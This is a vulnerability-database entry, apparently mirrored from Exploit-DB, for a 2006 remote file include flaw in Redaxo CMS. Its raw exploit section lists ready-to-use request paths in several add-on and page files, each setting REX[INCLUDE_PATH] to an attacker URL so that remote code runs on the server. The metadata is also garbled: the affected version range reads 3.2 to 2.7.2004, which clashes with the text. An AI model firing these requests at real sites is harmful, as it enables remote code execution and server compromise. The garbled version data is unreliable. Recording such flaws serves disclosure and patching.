header-logo
Suggest Exploit
vendor:
Redaxo CMS
by:
beford
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Redaxo CMS
Affected Version From: 3.2
Affected Version To: 2.7.2004
Patch Exists: Yes
Related CWE: N/A
CPE: a:redaxo:redaxo_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Redaxo CMS

Redaxo CMS versions 3.2, 3.1, 3.0, and 2.7.4 are vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the REX[INCLUDE_PATH] parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Redaxo CMS.
Source

Exploit-DB raw data:

Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>

Redaxo 3.2 - 3.1 - 3.0

./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 3.0

./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

Redaxo 2.7.4

./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker

# milw0rm.com [2006-06-02]